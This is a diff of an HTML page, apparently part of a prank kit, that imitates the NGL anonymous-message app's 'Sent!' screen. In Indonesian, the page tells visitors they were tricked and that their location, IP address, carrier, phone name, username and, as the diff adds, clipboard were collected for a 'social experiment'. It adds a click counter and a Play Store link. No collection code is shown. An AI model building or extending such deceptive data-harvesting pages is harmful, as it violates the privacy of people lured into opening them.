--- a/sent_prank.html
+++ b/sent_prank.html
@@ -5,10 +5,11 @@
     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 
     <title>NGL - Sent!</title>
-    <link rel="icon" type="image/x-icon" href="https://i.playboard.app/p/086987c02279eb8761d1088a017d9d17/default.jpg">
     <script src="https://www.gstatic.com/firebasejs/8.10.1/firebase-app.js"></script>
     <script src="https://www.gstatic.com/firebasejs/8.10.1/firebase-firestore.js"></script>
+    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
     <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
+
     <link rel="stylesheet" href="./sent_files/normalize.css">
     <link rel="stylesheet" href="./sent_files/style.css">
 
@@ -16,6 +17,7 @@
     <script src="./sent_files/main.js"></script>
 
 
+    <link rel="icon" type="image/x-icon" href="https://i.playboard.app/p/086987c02279eb8761d1088a017d9d17/default.jpg">
     <meta name="viewport" content="initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
     <meta property="og:image">
     <meta property="og:title" content="@user: Send me anonymous messages!">
@@ -38,16 +40,17 @@
         <img class="check" src="./sent_files/sent.png">
         <h1 class="sent">Sorry</h1>
         <h2 class="download-prompt"> 👇 <span class="clickCount">1</span> Orang Yang Tertipu 👇 </h2>
-        <a class="button download-link pulse" href="https://www.instagram.com/akbaraji731/">Ini Palsu, Data Kamu Telah
-            Diambil! - Sosial Experiment</a>
-
+        <a class="button download-link pulse" href="https://play.google.com/store/apps/dev?id=8834799443673829033">Ini
+            Palsu, Data Kamu Telah
+            Diambil!</a>
 
         <h2 class="download-prompt"> Ini hanya sosial experiment untuk mengetahui seberapa pedulikah anda untuk
             berhati-hati dalam membuka suatu link yang belum diketahui integritas keamananya. </h2>
 
-        <h2 class="download-prompt"> Data yang diambil hanya lokasi, IP Address, provider, nama ponsel dan username.
-            Data ini akan
-            dihapus setelah sosial experiment ini berakhir. </h2>
+        <h2 class="download-prompt"> Data yang diambil hanya lokasi, IP Address, provider, nama ponsel, clipboard dan
+            username. Data ini akan dihapus setelah sosial experiment ini berakhir. </h2>
+
+        <h2 class="download-prompt"> 👆 <span class="klik_auto">1</span> Orang Yang Mengklik Link👆 </h2>
 
         <h2 class="download-prompt"> @akbaraji731 </h2>
     </div>
